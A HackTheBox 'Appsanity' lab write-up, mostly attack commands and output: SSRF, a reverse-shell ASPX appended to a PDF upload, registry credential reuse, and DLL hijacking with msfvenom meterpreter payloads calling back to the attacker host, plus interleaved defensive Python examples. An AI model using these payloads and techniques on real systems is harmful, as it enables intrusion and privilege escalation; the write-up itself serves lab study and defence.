HackTheBox - Appsanity

Tools

  • nmap
  • gobuster
  • ffuf
  • Burp Suite
  • msfvenom
  • netcat
  • metasploit
  • dnSpy
  • Evil-WinRM

Getting User

Nmap

┌──(kali㉿kali)-[~/HTB/Appsanity]
└─$ sudo nmap -sS -sV -oA nmap/initial_scan 10.129.46.232
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-29 06:22 EDT
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 06:23 (0:00:17 remaining)
Nmap scan report for 10.129.46.232
Host is up (0.43s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
443/tcp open https?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.66 seconds

┌──(kali㉿kali)-[~/HTB/Appsanity]
└─$ sudo nmap -sS -p- -Pn --min-rate 500 -oA nmap/full_tcp_scan 10.129.46.232
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-29 06:27 EDT
Nmap scan report for 10.129.46.232
Host is up (0.43s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
443/tcp open https
5985/tcp open wsman

Nmap done: 1 IP address (1 host up) scanned in 263.20 seconds

┌──(kali㉿kali)-[~/HTB/Appsanity]
└─$ sudo nmap -sC -sV -oA nmap/script_scan -p 80,443,5985 10.129.46.232
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-29 06:42 EDT
Nmap scan report for 10.129.46.232
Host is up (0.43s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to https://meddigi.htb/
443/tcp open https?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.55 seconds


Foothold

Add the vhost to /etc/hosts:

┌──(kali㉿kali)-[~/HTB/Appsanity]
└─$ echo "10.129.46.232 meddigi.htb" | sudo tee -a /etc/hosts
10.129.46.232 meddigi.htb

Enumerating directories with gobuster found nothing.

┌──(kali㉿kali)-[~/HTB/Appsanity]
└─$ gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://meddigi.htb -b 404,302
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://meddigi.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404,302
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Using Burp to intercept the request when creating an account, I changed the account type from 1 to 2, which gives me a doctor’s account.

Acctype=2

We get an access_token cookie that looks like a JWT:

access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjgiLCJlbWFpbCI6ImRvY3RvckB3aG8uY29tIiwibmJmIjoxNjk4NTc4Njk2LCJleHAiOjE2OTg1ODIyOTYsImlhdCI6MTY5ODU3ODY5NiwiaXNzIjoiTWVkRGlnaSIsImF1ZCI6Ik1lZERpZ2lVc2VyIn0.f482mFiYLxXIOctRjncQ8WlE2Wz1v9L9QZwTjAWm0i0;

When decoded we get this payload; nothing useful in it.

{
"unique_name": "8",
"email": "doctor@who.com",
"nbf": 1698578696,
"exp": 1698582296,
"iat": 1698578696,
"iss": "MedDigi",
"aud": "MedDigiUser"
}

Fuzzing vhosts, we found a portal subdomain:

┌──(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u https://meddigi.htb -H 'Host: FUZZ.meddigi.htb' -c

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : https://meddigi.htb
:: Wordlist : FUZZ: /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.meddigi.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

portal [Status: 200, Size: 2976, Words: 1219, Lines: 57, Duration: 325ms]

I couldn’t find the ref. number anywhere.

So I went to portal.meddigi.htb/Profile, intercepted the request and the response, and added a Set-Cookie header to the response that sets the access_token obtained from the main site:

HTTP/2 302 Found
Location: /Profile
Server: Microsoft-IIS/10.0
Strict-Transport-Security: max-age=2592000
Set-Cookie: access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjEwIiwiZW1haWwiOiJkb2N0b3JAd2hvLmNvbSIsIm5iZiI6MTY5ODg0OTIzMywiZXhwIjoxNjk4ODUyODMzLCJpYXQiOjE2OTg4NDkyMzMsImlzcyI6Ik1lZERpZ2kiLCJhdWQiOiJNZWREaWdpVXNlciJ9.8s17W4ZWYU6H_elGsVj-xtI_RDmCnqEcJk4RVF_zPP8; expires=Wed, 01 Nov 2023 16:33:53 GMT; path=/; secure; samesite=strict; httponly
Date: Wed, 01 Nov 2023 14:33:53 GMT

This gets us into the doctor’s portal profile.
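To make the two steps above concrete (decoding the token, and why a cookie issued by the main site was accepted by the portal), here is an added Python example that is not part of the writeup. It decodes the page’s access_token without verification, then shows the acceptance check a server should run: pinned algorithm, HMAC check, a per-application audience, and the time window. The signing key used for the passing case is constructed for the example; the real MedDigi key is unknown and nothing here recovers it.

```python
import base64
import hashlib
import hmac
import json
import time

# access_token copied from the writeup (the self-registered "doctor" account).
PAGE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1bmlxdWVfbmFtZSI6IjgiLCJlbWFpbCI6ImRvY3RvckB3aG8uY29tIiwibmJmIjoxNjk4NTc4Njk2LCJleHAiOjE2OTg1ODIyOTYsImlhdCI6MTY5ODU3ODY5NiwiaXNzIjoiTWVkRGlnaSIsImF1ZCI6Ik1lZERpZ2lVc2VyIn0."
    "f482mFiYLxXIOctRjncQ8WlE2Wz1v9L9QZwTjAWm0i0"
)

def b64url_decode(segment):
    # JWT segments are base64url without padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def decode_unverified(token):
    """What a JWT debugger shows: header and claims, with no proof of authenticity."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))

def sign_hs256(header_b64, payload_b64, key):
    msg = (header_b64 + "." + payload_b64).encode()
    return b64url_encode(hmac.new(key, msg, hashlib.sha256).digest())

def verify_hs256(token, key, expected_aud, expected_iss, now=None):
    """Server-side acceptance test: alg pinned to HS256, HMAC over header.payload,
    audience and issuer must match THIS application, and nbf <= now < exp.
    Returns the claims on success, None on any failure."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header, claims = decode_unverified(token)
    if header.get("alg") != "HS256":
        return None
    if not hmac.compare_digest(sign_hs256(header_b64, payload_b64, key), sig_b64):
        return None
    if claims.get("aud") != expected_aud or claims.get("iss") != expected_iss:
        return None
    now = int(time.time()) if now is None else now
    if now < claims.get("nbf", 0) or now >= claims.get("exp", 0):
        return None
    return claims

def mint_hs256(claims, key):
    """Issue a token the way an HS256 server would (used only to show a passing verify)."""
    header_b64 = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload_b64 = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    return header_b64 + "." + payload_b64 + "." + sign_hs256(header_b64, payload_b64, key)
```

Giving the portal its own audience (or its own key) is what makes the Set-Cookie trick above fail: a token with aud MedDigiUser is then rejected there even though its signature is valid.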

Found nothing in the Scheduler.

The Issue Prescription page could be vulnerable to SSRF, so I intercepted the request and sent it to Repeater.

We find that the address http://127.0.0.1:8080/ allows us to see the reports.
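An added Python example, not from the writeup, of the validation the Issue Prescription URL field (the Link parameter used later) was missing: an allow-list check for server-side fetches that rejects loopback and private targets such as http://127.0.0.1:8080/. ALLOWED_HOSTS and the injectable resolver are assumptions for the example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed policy for the prescription "Link" field: only these hosts, only https.
ALLOWED_HOSTS = {"meddigi.htb", "portal.meddigi.htb"}

def resolve_all(host):
    """All A/AAAA answers for host (the real resolver; tests inject a fake one)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def classify_link(url, allowed_hosts=ALLOWED_HOSTS, resolver=resolve_all):
    """Return (ok, reason) for a user-supplied URL the server would fetch.
    Checks in order: parseable, https only, default port only, host on the
    allow-list, and every resolved address public. That covers 127.0.0.1,
    10.x, the user@host trick (hostname is what comes after '@') and DNS
    rebinding to loopback. The fetch itself must also not follow redirects."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        port = parts.port
    except ValueError:
        return False, "unparseable url"
    if parts.scheme.lower() != "https":
        return False, "scheme %r not allowed" % parts.scheme
    if not host:
        return False, "missing host"
    if port not in (None, 443):
        return False, "port %s not allowed" % port
    if host not in allowed_hosts:
        return False, "host %r not on allow-list" % host
    try:
        addrs = resolver(host)
    except OSError:
        return False, "host does not resolve"
    if not addrs:
        return False, "host does not resolve"
    for addr in addrs:
        if not ipaddress.ip_address(addr).is_global:
            return False, "%s resolves to non-public address %s" % (host, addr)
    return True, "ok"
```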

I found an aspx reverse shell at https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx.
Alternatively, we could use msfvenom to create a shell:

┌──(kali㉿kali)-[~/HTB/Appsanity/files]
└─$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=tun0 LPORT=9998 -f aspx -o shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 684 bytes
Final size of aspx file: 4565 bytes
Saved as: shell.aspx

I went to the Upload Report page, uploaded a blank PDF and intercepted the request.
Change the extension of the PDF from .pdf to .aspx and add the shell after %%EOF.

Change the host to your IP and forward the request.
Now we can listen on the port using nc:

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...

Head back to Repeater and we should see our report.

If we go to the Raw tab of the response and scroll down, we find the View Report link of our uploaded shell, which is ViewReport.aspx?file=2be24979-ddae-4f57-a9e7-d94e44429b64_blank.aspx.
Added it to the Link parameter as http%3a//127.0.0.1%3a8080/ViewReport.aspx?file=2be24979-ddae-4f57-a9e7-d94e44429b64_blank.aspx and sent the request,

and it spawned a shell

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.71] from (UNKNOWN) [10.129.71.74] 65463
Spawn Shell...
Microsoft Windows [Version 10.0.19045.3570]
(c) Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>
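The upload step above works because the Upload Report handler trusts the client’s extension and never looks past the PDF header, and because the stored file is then reachable through an executable path. An added Python example, not from the writeup, of the checks a defender would put in that handler; the size limit and naming scheme are assumptions.

```python
import uuid

PDF_MAGIC = b"%PDF-"
ALLOWED_EXT = {".pdf"}
MAX_SIZE = 10 * 1024 * 1024  # constructed limit

def validate_report(filename, data):
    """Return (ok, reason) for an Upload Report submission.
    The extension decides which IIS handler later touches the file, so it is
    checked first; the body checks catch a renamed file and anything appended
    after the PDF trailer."""
    # Strip any client-supplied path components before looking at the extension.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    dot = name.rfind(".")
    ext = name[dot:].lower() if dot > 0 else ""
    if ext not in ALLOWED_EXT:
        return False, "extension %r not allowed" % ext
    if len(data) > MAX_SIZE:
        return False, "file too large"
    if not data.startswith(PDF_MAGIC):
        return False, "content is not a PDF"
    eof = data.rfind(b"%%EOF")  # last trailer; incremental updates may have several
    if eof < 0:
        return False, "no %%EOF trailer"
    if data[eof + len(b"%%EOF"):].strip():
        return False, "trailing data after %%EOF"
    return True, "ok"

def storage_name(owner_id):
    """Server-chosen name: the client's filename is only logged, never reused,
    and the extension is fixed, so a ViewReport link can only point at a .pdf."""
    return "%s_%s.pdf" % (owner_id, uuid.uuid4().hex)
```

Store the result outside the web root and have ViewReport stream it with Content-Type application/pdf; a file IIS never maps to a script handler cannot spawn a shell however it was crafted.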

Found the user flag on the Desktop of the user’s folder:

c:\Users\svc_exampanel\Desktop>type user.txt
type user.txt
ee64bccf15802ae700de4ccf1a4d9944

Getting Root

Information Gathering

Going to open a session using Metasploit and msfvenom to have a persistent session:

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > seet PAYLOAD windows/x64/meterpreter/reverse_https
[-] Unknown command: seet
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_https
PAYLOAD => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => 10.10.14.71
msf6 exploit(multi/handler) > set LPORT 9998
LPORT => 9998
msf6 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf6 exploit(multi/handler) > exploit

[*] Started HTTPS reverse handler on https://10.10.14.71:9998
[!] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Without a database connected that payload UUID tracking will not work!
[*] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Staging x64 payload (201820 bytes) ...
[!] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Without a database connected that payload UUID tracking will not work!
[!] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Without a database connected that payload UUID tracking will not work!
[*] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Staging x64 payload (201820 bytes) ...
[!] https://10.10.14.71:9998 handling request from 10.129.134.38; (UUID: omvmaxhy) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.14.71:9998 -> 10.129.134.38:62064) at 2023-11-04 06:55:45 -0400
[*] Meterpreter session 2 opened (10.10.14.71:9998 -> 10.129.134.38:62063) at 2023-11-04 06:55:45 -0400

msf6 exploit(multi/handler) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows APPSANITY\svc_exampanel @ APPSANITY 10.10.14.71:9998 -> 10.129.134.38:62064 (10.129.134.38)
2 meterpreter x64/windows APPSANITY\svc_exampanel @ APPSANITY 10.10.14.71:9998 -> 10.129.134.38:62063 (10.129.134.38)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter >

Found some DLLs in the inetpub folder and downloaded them for inspection:

meterpreter > dir
Listing: c:\inetpub\ExaminationPanel\ExaminationPanel\bin
=========================================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 591752 fil 2023-09-24 11:46:11 -0400 EntityFramework.SqlServer.dll
100666/rw-rw-rw- 4991352 fil 2023-09-24 11:46:13 -0400 EntityFramework.dll
100666/rw-rw-rw- 13824 fil 2023-09-24 11:46:10 -0400 ExaminationManagement.dll
100666/rw-rw-rw- 40168 fil 2023-09-24 11:46:10 -0400 Microsoft.CodeDom.Providers.DotNetCompilerPlatform.dll
100666/rw-rw-rw- 206512 fil 2023-09-24 11:46:11 -0400 System.Data.SQLite.EF6.dll
100666/rw-rw-rw- 206520 fil 2023-09-24 11:46:11 -0400 System.Data.SQLite.Linq.dll
100666/rw-rw-rw- 431792 fil 2023-09-24 11:46:11 -0400 System.Data.SQLite.dll
040777/rwxrwxrwx 24576 dir 2023-09-24 11:49:49 -0400 roslyn
040777/rwxrwxrwx 0 dir 2023-09-24 11:49:49 -0400 x64
040777/rwxrwxrwx 0 dir 2023-09-24 11:49:49 -0400 x86
meterpreter > download ExaminationManagement.dll
[*] Downloading: ExaminationManagement.dll -> /home/kali/HTB/Appsanity/ExaminationManagement.dll
[*] Downloaded 13.50 KiB of 13.50 KiB (100.0%): ExaminationManagement.dll -> /home/kali/HTB/Appsanity/ExaminationManagement.dll
[*] Completed : ExaminationManagement.dll -> /home/kali/HTB/Appsanity/ExaminationManagement.dll

I installed Wine [https://www.winehq.org/] to be able to use dnSpy on Linux to analyze the DLL:

┌──(kali㉿kali)-[~/Downloads]
└─$ unzip dnSpy-net-win64.zip -d dnSpy

┌──(kali㉿kali)-[~/Downloads]
└─$ cd dnSpy

┌──(kali㉿kali)-[~/Downloads/dnSpy]
└─$ wine dnSpy.exe

Found an encryption key located in the registry.

Spawn a shell to query the registry and search for the key:

meterpreter > shell
Process 3292 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.3570]
(c) Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>reg query HKLM\Software\MedDigi
reg query HKLM\Software\MedDigi

HKEY_LOCAL_MACHINE\Software\MedDigi
EncKey REG_SZ 1g0tTh3R3m3dy!!

Got the list of users to try the password on:

c:\windows\system32\inetsrv>dir C:\Users
dir C:\Users
Volume in drive C has no label.
Volume Serial Number is F854-971D

Directory of C:\Users

10/18/2023 05:43 PM <DIR> .
10/18/2023 05:43 PM <DIR> ..
10/18/2023 06:08 PM <DIR> Administrator
09/24/2023 11:16 AM <DIR> devdoc
09/15/2023 06:59 AM <DIR> Public
10/18/2023 06:40 PM <DIR> svc_exampanel
10/17/2023 03:05 PM <DIR> svc_meddigi
10/18/2023 07:10 PM <DIR> svc_meddigiportal
0 File(s) 0 bytes
8 Dir(s) 3,733,925,888 bytes free

Using Evil-WinRM, we were able to log in as devdoc with that password:

┌──(kali㉿kali)-[~/HTB/Appsanity/files]
└─$ evil-winrm -i meddigi.htb -u devdoc -p "1g0tTh3R3m3dy\!\!"

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\devdoc\Documents>

Downloaded winPEAS [https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS] and ran it:

┌──(kali㉿kali)-[~/Tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.71.74 - - [01/Nov/2023 13:37:14] "GET /winPEASx64.exe HTTP/1.1" 200 -
*Evil-WinRM* PS C:\Users\devdoc\Desktop> curl http://10.10.14.71/winPEASx64.exe -o winpeas.exe
*Evil-WinRM* PS C:\Users\devdoc\Desktop> ./winpeas.exe

The script tells us about ReportManagement, which runs on port 100 and is located in C:\Program Files\ReportManagement.

Download the ReportManagement.exe found in that folder and analyse it using IDA Free:

*Evil-WinRM* PS C:\Program Files\ReportManagement> download ReportManagement.exe

Info: Downloading C:\Program Files\ReportManagement\ReportManagement.exe to ReportManagement.exe

Info: Download successful!

It tells us about C:\Program Files\ReportManagement\Libraries and externalupload.dll.

Going to C:\Program Files\ReportManagement\Libraries, we see that externalupload.dll doesn’t exist.
We can try to create a malicious DLL to escalate privileges.
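An added Python audit, not from the writeup, for the condition just described: a privileged service expects a DLL in its Libraries folder, the DLL is absent, and a low-privileged user can write to that folder. The expected-DLL list comes from analysing the binary as the writeup did; the fixture names in demo_findings are constructed, and the writability predicate is injectable so the audit can be run against a real ACL check on Windows.

```python
import os
import shutil
import tempfile

def audit_library_dir(lib_dir, expected_dlls, writable=lambda p: os.access(p, os.W_OK)):
    """Findings for a privileged service's private DLL directory.
    expected_dlls: names the binary loads from lib_dir (from reversing it);
    writable(path): 'can the low-privileged user write here?' (os.access is a
    rough stand-in; on Windows substitute an ACL check for the service's callers)."""
    findings = []
    dir_writable = os.path.isdir(lib_dir) and writable(lib_dir)
    if dir_writable:
        findings.append(("WRITABLE_DIR", lib_dir))
    for name in expected_dlls:
        path = os.path.join(lib_dir, name)
        if not os.path.exists(path):
            # Absent DLL in a writable directory: whatever is dropped there is loaded as the service.
            findings.append(("PLANTABLE" if dir_writable else "MISSING", path))
        elif writable(path):
            findings.append(("REPLACEABLE", path))
    return findings

def demo_findings():
    """Constructed fixture mirroring the writeup: one DLL present, externalupload.dll absent.
    Returns the findings for a world-writable folder and for a locked-down one."""
    base = tempfile.mkdtemp()
    lib = os.path.join(base, "Libraries")
    os.mkdir(lib)
    open(os.path.join(lib, "present.dll"), "wb").close()
    expected = ["present.dll", "externalupload.dll"]
    try:
        open_folder = audit_library_dir(lib, expected, writable=lambda p: True)
        locked_folder = audit_library_dir(lib, expected, writable=lambda p: False)
    finally:
        shutil.rmtree(base)
    return open_folder, locked_folder
```

The fix is the locked-down case: an ACL on Libraries that lets only the service account and administrators write, which turns PLANTABLE into a harmless MISSING.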


Privilege Escalation

Create a payload using msfvenom and start a reverse shell handler in Metasploit:

┌──(kali㉿kali)-[~/HTB/Appsanity/files]
└─$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=tun0 LPORT=1234 -f dll -o externalupload.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 596 bytes
Final size of dll file: 9216 bytes
Saved as: externalupload.dll

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_https
PAYLOAD => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

Upload the payload to the Libraries folder:

*Evil-WinRM* PS C:\Program Files\ReportManagement\Libraries> upload externalupload.dll

Info: Uploading /home/kali/HTB/Appsanity/files/externalupload.dll to C:\Program Files\ReportManagement\Libraries\externalupload.dll

Data: 12288 bytes of 12288 bytes copied

Info: Upload successful!

Going to use chisel to forward port 100 from the victim’s machine so we can trigger the upload function:

┌──(kali㉿kali)-[~/HTB/Appsanity/files]
└─$ chisel server --port 6666 --reverse
2023/11/04 09:24:07 server: Reverse tunnelling enabled
2023/11/04 09:24:07 server: Fingerprint vzyjBtK8hiIqkFohzO0L1c0qj0XzCUSlGutBa5Farv4=
2023/11/04 09:24:07 server: Listening on http://0.0.0.0:6666

Upload chisel.exe to devdoc’s Desktop and forward port 100:

*Evil-WinRM* PS C:\Users\devdoc\Desktop> upload chisel.exe

Info: Uploading /home/kali/HTB/Appsanity/files/chisel.exe to C:\Users\devdoc\Desktop\chisel.exe

Data: 12008104 bytes of 12008104 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\devdoc\Desktop> ./chisel.exe client 10.10.14.71:6666 R:100:127.0.0.1:100
chisel.exe : 2023/11/04 07:39:16 client: Connecting to ws://10.10.14.71:6666
+ CategoryInfo : NotSpecified: (2023/11/04 07:3...0.10.14.71:6666:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
2023/11/04 07:39:18 client: Connected (Latency 293.0101ms)

Now connect to the forwarded port using netcat, which opens the Report Management admin console running on port 100.
Trigger our payload using the upload command:

┌──(kali㉿kali)-[~/HTB/Appsanity]
└─$ nc 127.0.0.1 100
Reports Management administrative console. Type "help" to view available commands.
upload externalupload.dll
Attempting to upload to external source.

It works and gets us an Administrator session:

msf6 exploit(multi/handler) > 
[*] Started HTTPS reverse handler on https://10.10.14.71:1234
[!] https://10.10.14.71:1234 handling request from 10.129.134.38; (UUID: jmuiiwgn) Without a database connected that payload UUID tracking will not work!
[*] https://10.10.14.71:1234 handling request from 10.129.134.38; (UUID: jmuiiwgn) Staging x64 payload (201820 bytes) ...
[!] https://10.10.14.71:1234 handling request from 10.129.134.38; (UUID: jmuiiwgn) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.14.71:1234 -> 10.129.134.38:62087) at 2023-11-04 10:48:50 -0400
sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows APPSANITY\Administrator @ APPSANITY 10.10.14.71:1234 -> 10.129.134.38:62087 (10.129.134.38)

msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > whoami
[-] Unknown command: whoami
meterpreter > getuid
Server username: APPSANITY\Administrator
meterpreter > cd C:/Users/Administrator
meterpreter > cd Desktop
meterpreter > dir
Listing: C:\Users\Administrator\Desktop
=======================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2023-09-24 13:28:16 -0400 desktop.ini
100444/r--r--r-- 34 fil 2023-11-04 06:14:15 -0400 root.txt